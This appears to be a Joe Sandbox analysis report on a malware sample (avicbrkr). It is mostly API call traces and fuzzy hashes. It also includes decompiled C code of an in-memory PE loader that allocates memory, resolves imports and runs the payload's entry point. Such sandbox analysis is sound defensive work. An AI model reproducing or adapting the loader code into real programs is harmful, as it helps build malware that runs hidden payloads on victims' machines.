                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual$lstrlen
                      • String ID:
                      • API String ID: 386137988-0
                      • Opcode ID: 376b43b428b9c0be8d39e0cf5d34c6079d27eaca83189f80ca10041498d89766
                      • Instruction ID: f865ba125a4e39ccd66d859be2f5c2fc609a1e8e709a7de3b18d8826e3754f4d
                      • Opcode Fuzzy Hash: 376b43b428b9c0be8d39e0cf5d34c6079d27eaca83189f80ca10041498d89766
                      • Instruction Fuzzy Hash: 06117C71804308FFEB12DF54C88AB9EBBB8EF04350F218089E90497211C378DA80DBA4

                      APIs
                      • RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                      • RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                      • lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                        • Part of subcall function 0037C12C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0039D244,?,?,00373DFB,0000012B,0039D244,?,?,?,00373E29,00000000,00000000), ref: 0037C16C
                        • Part of subcall function 0037C12C: CloseHandle.KERNEL32(000000FF), ref: 0037C177
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseCreateErrorHandleLastOpenlstrlen
                      • String ID:
                      • API String ID: 3614645836-0
                      • Opcode ID: 97a6eca8fb068b9129d3e8fc598261c204925822964635bb239658bcbf71f26c
                      • Instruction ID: aa2aef5864deebde1b63d96243c92f1008c5638927675a06dbba85f7692e5fdf
                      • Opcode Fuzzy Hash: 97a6eca8fb068b9129d3e8fc598261c204925822964635bb239658bcbf71f26c
                      • Instruction Fuzzy Hash: 09F03676114108BFD7229F50DC85EEB7FACEB45350F10D016FD0996250D7799A90C7A1

                      APIs
                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                      • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                      • CloseHandle.KERNEL32(00000000), ref: 0038879B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CloseHandleOpenWow64
                      • String ID:
                      • API String ID: 10462204-0
                      • Opcode ID: 9273dec6a411cbd1e69006d823596923789eb60a9d9291a6bcc3377930522007
                      • Instruction ID: 86b5585d3d4bedb2d2ba067a73c351bea1d7cfb6d1ae9ca48e72c65b80973012
                      • Opcode Fuzzy Hash: 9273dec6a411cbd1e69006d823596923789eb60a9d9291a6bcc3377930522007
                      • Instruction Fuzzy Hash: 04F05E75900218FF9B22AF55DD488DEBBBCEF85791B3141A6FA05E6200E7314E01D7A0

                      Memory Dump Source
                      • Source File: 00000010.00000002.1217237450.00590000.00000040.sdmp, Offset: 00590000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_590000_avicbrkr.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: x
                      • API String ID: 544645111-2363233923
                      • Opcode ID: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction ID: a4096a51608fa36d4e5dbe62984bed4bae9cb6734439b3751b996c6aac777688
                      • Opcode Fuzzy Hash: 13a2c97311ebe5e01ae6c14131f6a038acb3d00137f498876f111329a79ccbc0
                      • Instruction Fuzzy Hash: 3A4179B5E006288FDB64CF68C980B89FBF1BF89310F16859AD959A7311D770AE85CF41

                      APIs
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • StrChrA.SHLWAPI(?,00000020), ref: 0037D3F3
                        • Part of subcall function 0037C038: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0037D428,00000125,?,00000004,00000000), ref: 0037C068
                        • Part of subcall function 0037C038: RtlAllocateHeap.NTDLL(00000000,00000004,00000000), ref: 0037C07E
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,?,00000000,?,?,?,0037D428,00000125), ref: 0037C0B4
                        • Part of subcall function 0037C038: memcpy.NTDLL(00000010,00000000,0037D428,?,?,?,0037D428), ref: 0037C0CF
                        • Part of subcall function 0037C038: CallNamedPipeA.KERNEL32(00000000,00000004,?,00000010,00000119,00000001), ref: 0037C0ED
                        • Part of subcall function 0037C038: GetLastError.KERNEL32(?,?,?,0037D428), ref: 0037C0F7
                        • Part of subcall function 0037C038: HeapFree.KERNEL32(00000000,00000000), ref: 0037C11D
                      • HeapFree.KERNEL32(00000000,?,00000125), ref: 0037D43B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocatememcpy$CallCloseErrorLastNamedPipeQueryValuelstrlen
                      • String ID:
                      • API String ID: 3840054301-0
                      • Opcode ID: be73e7476521ab597fb4914701e121bf94567b88d4e32d945e956f1f956cdb75
                      • Instruction ID: f9b40833333a3cf408adf6279946120a657861fbe78f04b19d04b211fbf48cfe
                      • Opcode Fuzzy Hash: be73e7476521ab597fb4914701e121bf94567b88d4e32d945e956f1f956cdb75
                      • Instruction Fuzzy Hash: 2221B435A00304FBDB23ABA9DC45B9E7FBDEF44350F1040A6E549A6291DB75EE00CB61

                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0037134E
                      • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0037135D
                        • Part of subcall function 003883F6: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0037138B,?), ref: 003883FE
                        • Part of subcall function 003883F6: GetVersion.KERNEL32 ref: 0038840D
                        • Part of subcall function 003883F6: GetCurrentProcessId.KERNEL32 ref: 0038841C
                        • Part of subcall function 003883F6: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00388439
                        • Part of subcall function 003883F6: GetLastError.KERNEL32 ref: 00388458
                        • Part of subcall function 00388461: lstrcpyn.KERNEL32(00000000,003994A4,00000008), ref: 00388486
                        • Part of subcall function 00388461: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 003884DA
                        • Part of subcall function 00388461: memcpy.NTDLL(00000000,00000000,00000000,00000000,?,00000001), ref: 00388523
                        • Part of subcall function 00388461: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,?,00000001), ref: 0038853C
                        • Part of subcall function 003891B4: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891DA
                        • Part of subcall function 003891B4: GetModuleFileNameA.KERNEL32(?,00000000,00000104,00000208,?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 003891E2
                        • Part of subcall function 003891B4: GetLastError.KERNEL32(?,?,?,?,003713A7,00000000,0039D298,00000000,?,?), ref: 00389220
                        • Part of subcall function 0038875C: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388777
                        • Part of subcall function 0038875C: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,003713BC,00000000,0039D298,00000000,?,?), ref: 00388788
                        • Part of subcall function 0038875C: CloseHandle.KERNEL32(00000000), ref: 0038879B
                        • Part of subcall function 0037DCD8: StrRChrA.SHLWAPI(0039D298,00000000,0000005C), ref: 0037DD14
                        • Part of subcall function 0037DCD8: _strupr.NTDLL ref: 0037DD2A
                        • Part of subcall function 0037DCD8: lstrlen.KERNEL32(0039D298), ref: 0037DD32
                        • Part of subcall function 0037DCD8: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDB2
                        • Part of subcall function 0037DCD8: RtlAddVectoredExceptionHandler.NTDLL(00000000,0037D30B), ref: 0037DDD9
                        • Part of subcall function 0037DCD8: GetLastError.KERNEL32(?,0039E605,00000001,0039D2DC,00000000), ref: 0037DDF3
                        • Part of subcall function 0037DCD8: RtlRemoveVectoredExceptionHandler.NTDLL(0039D264), ref: 0037DE09
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Process$CreateErrorFileLast$EventExceptionHandlerModuleNameOpenTimeVectoredVirtual$AllocCloseCurrentFreeHandleHeapRemoveSystemVersionWow64_struprlstrcpynlstrlenmemcpy
                      • String ID:
                      • API String ID: 4208673994-0
                      • Opcode ID: a7f75732926ab873ce3514f9910cca6053cb109d6d6dc55c14e1dcb8773a20bb
                      • Instruction ID: 20d08d064b7bea6bbab3b8646897dfc6cef2dcc00239a36577ccb7ad6cab90bd
                      • Opcode Fuzzy Hash: a7f75732926ab873ce3514f9910cca6053cb109d6d6dc55c14e1dcb8773a20bb
                      • Instruction Fuzzy Hash: 8801F236210309BAEF236F71EC07F693BACAB00304F508826F846EA5D0EBB9C8008710

                      APIs
                      • InterlockedIncrement.KERNEL32(0039D18C), ref: 00371423
                        • Part of subcall function 00371345: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0037134E
                        • Part of subcall function 00371345: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0037135D
                      • InterlockedDecrement.KERNEL32(0039D18C), ref: 00371447
                        • Part of subcall function 003713D6: SetEvent.KERNEL32(0039D29C,0037D502), ref: 003713E0
                        • Part of subcall function 003713D6: CloseHandle.KERNEL32(0039D29C), ref: 003713F5
                        • Part of subcall function 003713D6: HeapDestroy.KERNEL32(0039D188), ref: 00371405
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: HeapInterlockedTime$CloseCreateDecrementDestroyEventFileHandleIncrementSystem
                      • String ID:
                      • API String ID: 3969339125-0
                      • Opcode ID: a0c1483c7a33ea23ee1cdf43a89257b69349d2cfb2b4c11d5f06c8d04b791ff6
                      • Instruction ID: 53050abce37f4ec493f840f06a161b2adb199f894f8b7bce1d9bb5bc42b90982
                      • Opcode Fuzzy Hash: a0c1483c7a33ea23ee1cdf43a89257b69349d2cfb2b4c11d5f06c8d04b791ff6
                      • Instruction Fuzzy Hash: 6EE0DF33608221779B335FBEAC05BAEA779AB10780F02C415FA8CD1098CA28CC00D295

                      APIs
                      • lstrcmp.KERNEL32(?,00000000), ref: 0038A3B4
                      • lstrlen.KERNEL32(?,00000000,00000000,?), ref: 0038A3BF
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: lstrcmplstrlen
                      • String ID:
                      • API String ID: 898299967-0
                      • Opcode ID: 8c10f301e7b0bffac5306e8c1d41512e6635f864b05ae3b1208748cb3a4b0131
                      • Instruction ID: 54b63d8d69bb9f4bc7578fbb484e234bc24b6a0bfeeefc84b514e9a87edbe3ee
                      • Opcode Fuzzy Hash: 8c10f301e7b0bffac5306e8c1d41512e6635f864b05ae3b1208748cb3a4b0131
                      • Instruction Fuzzy Hash: 51415C75A10705DFEF15EF56C884BAE77B9BF44301F2980AAD8129B340E3B4EA40DB51

                      APIs
                      • GetModuleHandleA.KERNEL32(0039E000,?,00000000,?,?,?,?,00000001,0038DC30,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 0038DADA
                        • Part of subcall function 0038814B: GetModuleHandleA.KERNEL32(-00000002,00000000,0039C828,00000000,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00388181
                        • Part of subcall function 0038911C: GetLastError.KERNEL32(00000000,00000000,00001000,00000000,00001000,00000000,0039C828,00000000), ref: 0038919B
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                        • Part of subcall function 003881D1: RtlEnterCriticalSection.NTDLL(H}*), ref: 003881F9
                        • Part of subcall function 003881D1: RtlLeaveCriticalSection.NTDLL(H}*), ref: 0038820A
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalHandleModuleSection$EnterErrorFreeHeapLastLeave
                      • String ID:
                      • API String ID: 3842935252-0
                      • Opcode ID: aeffd02d86bee0869922dabf2eb75dc53248d304059443e4df343e1f16a19876
                      • Instruction ID: 09586f76ef7f93c470c357d3d8d89d3d7fd66cb3f94f8607e8f89fb01b01e70d
                      • Opcode Fuzzy Hash: aeffd02d86bee0869922dabf2eb75dc53248d304059443e4df343e1f16a19876
                      • Instruction Fuzzy Hash: 73218676B00314ABCF23FF99C886A9DB7B9FB44310F5744E6D505AB281D6709D42CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetModuleHandleA.KERNEL32(-00000002,00000000,0039C828,00000000,?,0037B5E2,00000000,00000000,00000000,0037D9D1,?,0000005C,?,0037DDEC,?), ref: 00388181
                        • Part of subcall function 003879CC: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,00399550,00000014,003881BE,?,00000000,?), ref: 00387A59
                        • Part of subcall function 003879CC: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,0037B5E2), ref: 00387A93
                        • Part of subcall function 003879CC: RtlEnterCriticalSection.NTDLL(H}*), ref: 00387ABC
                        • Part of subcall function 003879CC: RtlLeaveCriticalSection.NTDLL(H}*), ref: 00387ADA
                        • Part of subcall function 003879CC: GetLastError.KERNEL32(?,0037B5E2), ref: 00387AEF
                        • Part of subcall function 0038885B: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,H}*), ref: 00388872
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalProtectSectionVirtual$EnterErrorHandleInformationLastLeaveModuleProcessQuery
                      • String ID:
                      • API String ID: 531956962-0
                      • Opcode ID: 8b7d2a113f5c5d457074baeb4116b715f37f213bb4b6ac20ec9d78aad12c63bd
                      • Instruction ID: d121ede9d6aa96d63bf9478e9a65651f5ceece0c04687dc9fd5cc5520c52082a
                      • Opcode Fuzzy Hash: 8b7d2a113f5c5d457074baeb4116b715f37f213bb4b6ac20ec9d78aad12c63bd
                      • Instruction Fuzzy Hash: 6F11C432200305AFDB22AF55CC89AB677A9EF003A0B954469F994CA150DF71DC42DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: 1166df96552922306aee1618dfd269723e89b5e5ff9c9f9ec43877bd91d5325b
                      • Instruction ID: 799137a8e670fe05f687dc073da9d8525955ba747153ad1f9abe6e4909607c1b
                      • Opcode Fuzzy Hash: 1166df96552922306aee1618dfd269723e89b5e5ff9c9f9ec43877bd91d5325b
                      • Instruction Fuzzy Hash: 51B012D52AD702BF3D0721045C07D36161CC4C0B303B0551FF001D8040E4405C860435
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: c44e01c974b7c6c524c1d47468bea98dc13a800c1d65d448f876a662e1c46fa8
                      • Instruction ID: 10352b2609caa755ee5de34ccd11f5af72b24d74544a7f3039f2a647745f977d
                      • Opcode Fuzzy Hash: c44e01c974b7c6c524c1d47468bea98dc13a800c1d65d448f876a662e1c46fa8
                      • Instruction Fuzzy Hash: D3A011C22AEA03BC3C0B2200AC02C3A022CC0C0BB03B0880EF002C8080A8800C8A0030
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: 850e7435eeda26d6cfb3106f0b39380b25dc6b50e11f16748d8c4b7aea31e7eb
                      • Instruction ID: 10352b2609caa755ee5de34ccd11f5af72b24d74544a7f3039f2a647745f977d
                      • Opcode Fuzzy Hash: 850e7435eeda26d6cfb3106f0b39380b25dc6b50e11f16748d8c4b7aea31e7eb
                      • Instruction Fuzzy Hash: D3A011C22AEA03BC3C0B2200AC02C3A022CC0C0BB03B0880EF002C8080A8800C8A0030
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • ___delayLoadHelper2@8.DELAYIMP ref: 003956E8
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D0057,00000000,00000001,0037D9D1,?,?,00370000), ref: 00395010
                        • Part of subcall function 00394F97: LoadLibraryA.KERNEL32(?), ref: 0039508D
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395099
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007E,00000000,00000001,0037D9D1), ref: 003950CC
                        • Part of subcall function 00394F97: InterlockedExchange.KERNEL32(0037853D,00000000), ref: 003950DE
                        • Part of subcall function 00394F97: LocalAlloc.KERNEL32(00000040,00000008), ref: 003950F2
                        • Part of subcall function 00394F97: FreeLibrary.KERNEL32(00000000), ref: 0039510F
                        • Part of subcall function 00394F97: GetProcAddress.KERNEL32(?,?,?,?,00370000), ref: 00395164
                        • Part of subcall function 00394F97: GetLastError.KERNEL32 ref: 00395170
                        • Part of subcall function 00394F97: RaiseException.KERNEL32(C06D007F,00000000,00000001,?), ref: 003951A2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ExceptionRaise$ErrorLastLibraryLoad$AddressAllocExchangeFreeHelper2@8InterlockedLocalProc___delay
                      • String ID:
                      • API String ID: 1405810187-0
                      • Opcode ID: 3698db9a5f5889aec3f83a612ac75573343b791735918777e7557ec31c5a2a11
                      • Instruction ID: 10352b2609caa755ee5de34ccd11f5af72b24d74544a7f3039f2a647745f977d
                      • Opcode Fuzzy Hash: 3698db9a5f5889aec3f83a612ac75573343b791735918777e7557ec31c5a2a11
                      • Instruction Fuzzy Hash: D3A011C22AEA03BC3C0B2200AC02C3A022CC0C0BB03B0880EF002C8080A8800C8A0030
                      Uniqueness

                      Uniqueness Score: -1,00%

                      C-Code - Quality: 100%
                      			E004011F2(long _a4) {
                      				void* _t2;
                      
                      				_t2 = RtlAllocateHeap( *0x40305c, 0, _a4); // executed
                      				return _t2;
                      			}


                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000000,00401553,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_400000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction ID: 4425f1c6487cb1303e53a5fb1f876b1ba006c7dfd0de678c3456b649a32eedb4
                      • Opcode Fuzzy Hash: d935b4f51a27394032f3c67b9e1b6a96a76f042afce792340da260ee13d390f0
                      • Instruction Fuzzy Hash: AEB01231000300EBDB019F00EF08F077F75A750701F10C030B304600B482714420EB1C
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217237450.00590000.00000040.sdmp, Offset: 00590000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_590000_avicbrkr.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction ID: 5c2fc5130ad994a717e15ac81a1ceab5d8d549c0cd1648c69377b274223737f4
                      • Opcode Fuzzy Hash: b0b6fff23bb3701b533ad5ae12780d3b05db8d0f63e38d42b121aa226cddd8d5
                      • Instruction Fuzzy Hash: 6D4102B0A012199FDB44CFA9C5846AEFBF0FF88310F61846EE848AB341D375A841CF95
                      Uniqueness

                      Uniqueness Score: -1,00%

                      C-Code - Quality: 100%
                      			E004015A3(intOrPtr* __ebx) {
                      				signed int _v8;
                      				intOrPtr _v12;
                      				signed int _v16;
                      				char _v20;
                      				void* __edi;
                      				void* _t24;
                      				signed int _t26;
                      				signed int _t27;
                      				signed int _t29;
                      				intOrPtr _t30;
                      				char* _t31;
                      				void* _t32;
                      				void* _t36;
                      				void* _t41;
                      
                      				_t20 =  *((intOrPtr*)(__ebx + 4));
                      				_t24 = VirtualAlloc(0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 4)) + 0x3c)) + _t20 + 0x50)) + 0x00000fff & 0xfffff000, 0x1000, 4); // executed
                      				_t36 = _t24;
                      				if(_t36 == 0) {
                      					_v8 = 8;
                      				} else {
                      					_t26 = E0040121C(_t36,  *((intOrPtr*)(__ebx + 4)));
                      					_v8 = _t26;
                      					if(_t26 == 0) {
                      						_t41 =  *((intOrPtr*)(_t36 + 0x3c)) + _t36;
                      						_t27 = E00401398(_t36, _t41);
                      						_v8 = _t27;
                      						if(_t27 == 0) {
                      							_t29 = E00401495(_t41, _t36); // executed
                      							_v8 = _t29;
                      							if(_t29 == 0) {
                      								_t30 = E00401542( *((intOrPtr*)(__ebx)));
                      								_v12 = _t30;
                      								if(_t30 == 0) {
                      									_t31 = 0;
                      								} else {
                      									_v16 = _v16 & 0x00000000;
                      									_v20 = 0xf1c0def0;
                      									_t31 =  &_v20;
                      								}
                      								_t32 =  *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x28)) + _t36))(_t36, 1, _t31); // executed
                      								if(_t32 != 0) {
                      									_v8 = _v8 & 0x00000000;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _v8;
                      			}


                      APIs
                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,752AC470,004016EC,?,?,00000000), ref: 004015C9
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?,00000000,752AC470,?,?,?,?,004015DE,00000000,?,?,?,00000000), ref: 0040125C
                        • Part of subcall function 0040121C: memcpy.NTDLL(004015DE,?,?), ref: 0040129A
                        • Part of subcall function 00401398: LoadLibraryA.KERNEL32(?), ref: 004013C5
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 004013D8
                        • Part of subcall function 00401398: memset.NTDLL ref: 004013E2
                        • Part of subcall function 00401398: GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 0040142D
                        • Part of subcall function 00401398: lstrlenA.KERNEL32(00000002,?,?,?,?,004015F0,?,00000000,?,?,?,00000000), ref: 00401440
                        • Part of subcall function 00401398: memset.NTDLL ref: 0040144A
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,00000000,00000000,?,?,004015FF,00000000), ref: 004014C3
                        • Part of subcall function 00401495: VirtualProtect.KERNELBASE(00000000,?,00000004,?), ref: 0040151B
                        • Part of subcall function 00401495: GetLastError.KERNEL32 ref: 00401521
                        • Part of subcall function 00401542: GetModuleFileNameW.KERNEL32(?,00000000,00000104,?,00000208,00000000,?,0040160D,?,00000000,?,00000000,?,?,?,00000000), ref: 00401560
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217158245.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000010.00000002.1217145146.00400000.00000002.sdmp
                      • Associated: 00000010.00000002.1217167536.00402000.00000002.sdmp
                      • Associated: 00000010.00000002.1217176686.00403000.00000004.sdmp
                      Joe Sandbox IDA Plugin
